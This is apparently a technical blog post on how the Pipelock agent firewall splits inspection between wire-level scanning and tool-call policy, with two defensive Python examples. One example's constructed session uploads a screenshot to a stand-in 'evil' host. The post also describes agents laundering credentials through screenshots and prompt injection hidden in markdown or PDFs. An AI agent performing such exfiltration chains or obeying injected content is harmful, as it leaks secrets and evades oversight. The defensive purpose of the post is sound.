What Pipelock Inspects, And What Tool Policy Inspects Instead
A wire-only proxy scans wire bytes. Opaque media bytes pass through the wire layer untouched. Anyone evaluating an agent firewall should know which class of attacks gets caught at which layer, because pretending the wire layer covers everything is the wrong sales pitch and the wrong mental model. This post is the layer split. Pipelock has two inspection layers that operate at different abstraction levels, and the marketing-friendly claim “we scan everything” is true for some shapes of attack and false for others. Saying so plainly is more useful to a buyer than saying nothing.
The wire layer
Pipelock’s wire layer scans bytes as they cross the proxy. Every transport Pipelock supports gets the same set of scanners:
- HTTP forward proxy. CONNECT and absolute-URI requests, request and response bodies on intercept paths, headers on every transport.
- MCP stdio. JSON-RPC frames on the subprocess pipe, both directions.
- MCP HTTP and SSE. JSON-RPC frames over HTTP, including streaming text/event-stream responses scanned per-event.
- WebSocket. Frames in both directions, fragment reassembly, A2A envelope payloads.
- Reverse proxy. Any HTTP-shaped agent backend Pipelock fronts.
What runs on those wire bytes:
- DLP: Pattern matching for credentials, secret formats, and high-entropy strings. Runs on URLs, request bodies, response bodies, headers, MCP arguments, MCP responses.
- Injection detection: Multi-pass content matching for prompt injection, jailbreak patterns, and tool-poisoning shapes. Runs on response bodies and MCP tool definitions.
- Redaction: Class-preserving outbound scrub for known credential and PII shapes. Runs on request bodies and MCP tools/call arguments.
- SSRF: Private-IP and metadata-endpoint protection on the URL pipeline. Runs on every transport with a URL.
The wire layer is good at credentials in headers, secrets in JSON, prompt injection in responses, and DLP-pattern leaks in tool calls. It is what stops an agent from POSTing an API key to a third-party logging service or fetching a markdown file with embedded jailbreak instructions and feeding it back to the model.
What the wire layer cannot do, and what no wire-only proxy can do without strapping on a perception model, is inspect the contents of opaque media:
- Images: A PNG of a credential-bearing screen has the credential rendered in pixels. The proxy sees image bytes, not text.
- Audio: A voice memo of a customer complaint contains words the proxy would have to transcribe to inspect.
- Video: Same shape as audio plus pixels.
- PDFs: A PDF can hold images, vector text, embedded fonts, and text-as-shapes. Naive PDF text extraction misses all of it.
Pipelock could in principle add OCR, ASR, and PDF extraction to the wire layer. None of those scans is free. OCR on every uploaded image multiplies proxy CPU by an order of magnitude. Latency budgets that work for text scanning collapse under perception. The architectural choice for the wire layer is to scan what is cheap, fast, and high-fidelity: text, structured data, and protocol headers. Opaque media gets a different treatment at a different layer.
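To make the wire-layer split concrete, here is an added example (written for this post, not Pipelock's own scanner code) of what a wire scanner can and cannot say about two MCP JSON-RPC frames. It walks the JSON, matches credential shapes as text, applies a Shannon-entropy check to token-shaped strings, and records an MCP image payload (a dict with a media `mimeType` and a base64 `data` field) as opaque rather than pretending to inspect its pixels. Both frames, the regex set, the entropy threshold and the tool name `http_post` are constructed for the illustration; the AWS key is the publicly documented example key.

```python
import json
import math
import re

# Credential shapes the wire layer can match as text. The AWS key used below is
# the documented public example key; the GitHub token is a constructed value.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

# Only token-shaped strings get the entropy test, so URLs, prose and base64
# media blobs do not trip it. Bounds and threshold are constructed choices.
TOKEN_SHAPE = re.compile(r"^[A-Za-z0-9_\-+/=]{24,64}$")
ENTROPY_THRESHOLD = 4.0  # bits per character

# MIME prefixes the wire layer records as opaque instead of scanning.
OPAQUE_MIME_PREFIXES = ("image/", "audio/", "video/", "application/pdf")


def shannon_entropy(s: str) -> float:
    """Bits per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_frame(frame: dict) -> dict:
    """Walk a JSON-RPC frame and report credential-shaped text.

    Returns {"findings": [(json_path, kind), ...], "opaque": [json_path, ...]}.
    Paths in "opaque" are MCP media payloads the wire layer saw but cannot read:
    their content is pixels or samples, not text.
    """
    findings, opaque = [], []

    def walk(node, path):
        if isinstance(node, dict):
            mime = node.get("mimeType", "")
            is_media = (isinstance(mime, str)
                        and mime.startswith(OPAQUE_MIME_PREFIXES)
                        and "data" in node)
            for key, value in node.items():
                if is_media and key == "data":
                    opaque.append(f"{path}.data")  # recorded, not inspected
                    continue
                walk(value, f"{path}.{key}")
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")
        elif isinstance(node, str):
            for kind, rx in SECRET_PATTERNS.items():
                if rx.search(node):
                    findings.append((path, kind))
            if TOKEN_SHAPE.match(node) and shannon_entropy(node) > ENTROPY_THRESHOLD:
                findings.append((path, "high_entropy"))

    walk(frame, "$")
    return {"findings": findings, "opaque": opaque}


# Constructed MCP tools/call frame: an agent posting a report, with two
# credentials in the arguments and one random-looking session token.
OUTBOUND_CALL = {
    "jsonrpc": "2.0", "id": 1, "method": "tools/call",
    "params": {
        "name": "http_post",
        "arguments": {
            "url": "https://api.example.test/upload",
            "headers": {"Authorization": "Bearer ghp_1234567890abcdefghijklmnopqrstuvwxyz"},
            "body": "AKIAIOSFODNN7EXAMPLE",
            "session": "0123456789abcdefghijklmnopqrstuv",
        },
    },
}

# Constructed MCP tool result carrying a screenshot. The base64 is a stand-in
# for real PNG bytes; whatever the pixels show, the scanner cannot read it.
SCREENSHOT_RESULT = {
    "jsonrpc": "2.0", "id": 2,
    "result": {"content": [{"type": "image",
                            "data": "iVBORw0KGgoAAAANSUhEUgAAAAEAAAAB",
                            "mimeType": "image/png"}]},
}

if __name__ == "__main__":
    for frame in (OUTBOUND_CALL, SCREENSHOT_RESULT):
        print(json.dumps(scan_frame(frame), indent=2))
```

Run stand-alone, the first frame yields three findings at their JSON paths and the second yields none, only an `opaque` entry for the image data. That asymmetry is the whole point of the layer split: the credential in the JSON body is caught here, the same credential rendered in the PNG is not, and no amount of wire-side pattern matching changes that.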
The tool layer
Above the wire layer, the agent makes deliberate choices: it picks a tool to call, it constructs an argument, it sends a JSON-RPC request that names a method and a payload. The tool layer inspects those choices, not the bytes the choices move. Two scanners run at this layer in Pipelock:
- mcp_tool_policy: Pre-execution allow / deny / redirect rules that match on tool names, argument patterns, and URL shapes inside arguments. The “screenshot a URL” tool can have a rule that blocks calls whose URL matches a sensitive host pattern. The URL is text, even when the result will be image bytes.
- tool_chain_detection: Sequence matchers that operate on the order in which an agent calls tools. A pattern like “screenshot the logged-in admin page, then upload the screenshot to a third-party host” is a sequence of calls whose individual calls are each plausibly fine. The chain matcher catches the shape of the sequence.
Both scanners operate on JSON-shaped data: method names, argument keys, URL strings inside arguments. Neither inspects the binary data the methods move; they operate one level above the bytes. What they catch that the wire layer cannot is an agent that wants to exfiltrate something the wire scanner cannot read. The agent screenshots a page and uploads the screenshot; the wire scanner sees a content-type of image/png and a stream of bytes, and has nothing to say. The tool-policy rule, watching the URL the agent passes to the screenshot tool, can see “this is a sensitive page” and block before the screenshot happens. The chain detector, watching the sequence, can see “the agent is screenshotting and uploading” and break the chain.
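The following is an added example of the two tool-layer checks working together on the screenshot-then-upload case described above. It is illustration code written for this post, not Pipelock's mcp_tool_policy or tool_chain_detection implementation, and the rule dictionaries, the tool names `browser_screenshot`, `http_upload` and `read_file`, the hosts and the quarantine URL are all constructed. A policy rule matches on the tool name and on the host of a URL-valued argument (first match wins, no match means allow), and a chain detector keeps a bounded window of executed calls and fires when a pattern's steps appear in order within it.

```python
import fnmatch
from collections import deque
from urllib.parse import urlparse

# Constructed policy in a hypothetical rule shape (not Pipelock's config
# syntax). Rules match on tool name and on the host of a URL-valued argument;
# the first matching rule wins and no match means the call is allowed.
POLICY_RULES = [
    {"tool": "browser_screenshot", "arg": "url", "host_glob": "admin.*", "action": "deny"},
    {"tool": "browser_screenshot", "arg": "url", "host_glob": "*.internal.example", "action": "deny"},
    {"tool": "http_upload", "arg": "url", "host_glob": "*.example.test", "action": "allow"},
    {"tool": "http_upload", "arg": "url", "host_glob": "*", "action": "redirect",
     "to": "https://quarantine.example.test/review"},
]

# Constructed chain pattern: each call is plausibly fine on its own; the
# ordered pair is the shape the text describes.
CHAIN_PATTERNS = {
    "screenshot_then_upload": ["browser_screenshot", "http_upload"],
}


def evaluate_policy(tool: str, args: dict):
    """Return the first matching rule, or None when no rule constrains the call."""
    for rule in POLICY_RULES:
        if not fnmatch.fnmatchcase(tool, rule["tool"]):
            continue
        value = args.get(rule["arg"])
        if not isinstance(value, str):
            continue
        host = urlparse(value).hostname or ""
        if fnmatch.fnmatchcase(host, rule["host_glob"]):
            return rule
    return None


def is_subsequence(pattern, history) -> bool:
    """True when pattern's tools appear in order (not necessarily adjacent) in history."""
    it = iter(history)
    return all(any(step == seen for seen in it) for step in pattern)


class ChainDetector:
    """Remembers the last `window` executed tool calls and matches ordered patterns."""

    def __init__(self, patterns=CHAIN_PATTERNS, window=5):
        self.patterns = patterns
        self.history = deque(maxlen=window)

    def observe(self, tool: str) -> list:
        self.history.append(tool)
        hits = []
        for name, seq in self.patterns.items():
            # A chain can only complete on its final step.
            if seq[-1] == tool and is_subsequence(seq, self.history):
                hits.append(name)
        return hits


def guard_call(tool: str, args: dict, detector: ChainDetector) -> dict:
    """Tool-layer decision for one call: policy first, then chain shape."""
    rule = evaluate_policy(tool, args)
    action = rule["action"] if rule else "allow"
    if action == "deny":
        # Denied calls never execute, so they do not enter the chain history.
        return {"action": "deny", "source": "policy", "detail": rule["host_glob"], "args": args}
    if action == "redirect":
        args = {**args, rule["arg"]: rule["to"]}
    chains = detector.observe(tool)
    if chains:
        return {"action": "deny", "source": "chain", "detail": chains[0], "args": args}
    return {"action": action, "source": "policy" if rule else "default",
            "detail": rule["host_glob"] if rule else "", "args": args}


def run_session() -> list:
    """Constructed three-call session: one policy deny, one allow, one chain deny."""
    detector = ChainDetector()
    calls = [
        ("browser_screenshot", {"url": "https://admin.corp.example/users"}),
        ("browser_screenshot", {"url": "https://docs.example.test/guide"}),
        ("http_upload", {"url": "https://paste.evil.test/up", "file": "shot.png"}),
    ]
    return [guard_call(tool, args, detector) for tool, args in calls]


if __name__ == "__main__":
    for decision in run_session():
        print(decision["action"], decision["source"], decision["detail"])
```

Two design points are worth noticing. A policy-denied call is not added to the chain history, because it never executed and therefore cannot be the first step of anything. And the chain matcher looks for an ordered subsequence within a bounded window rather than adjacent calls, so a few benign reads between the screenshot and the upload do not hide the shape, while the window keeps an unrelated screenshot from hours ago from poisoning every later upload.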
The two layers cooperate. Wire scanning catches the credential leak the agent attempts as JSON. Tool-policy catches the equivalent leak the agent tries to launder through a screenshot. Neither alone is enough. Both together cover the surface a wire-only or tool-only design leaves open. The enforcement boundary still matters. Tool policy and wire inspection only see traffic that reaches them, which is why the three-UID containment pattern and Kubernetes per-pod separation are part of the same posture.
What that means for the buyer
If your evaluation rubric reads “does this tool inspect images,” the honest answer is that Pipelock does not, and that is the right design. The right question to ask any agent firewall is which layer catches which class of attack:
- Credentials in JSON request bodies: wire layer, DLP scanner.
- Credentials in screenshots uploaded as image bytes: tool layer, mcp_tool_policy URL rule on the screenshot tool.
- Prompt injection in a markdown response: wire layer, injection scanner on response body.
- Prompt injection in a PDF the agent fetches and processes: tool layer, policy rule on the fetch tool, plus DLP and injection scanning on whatever text the PDF parser eventually emits.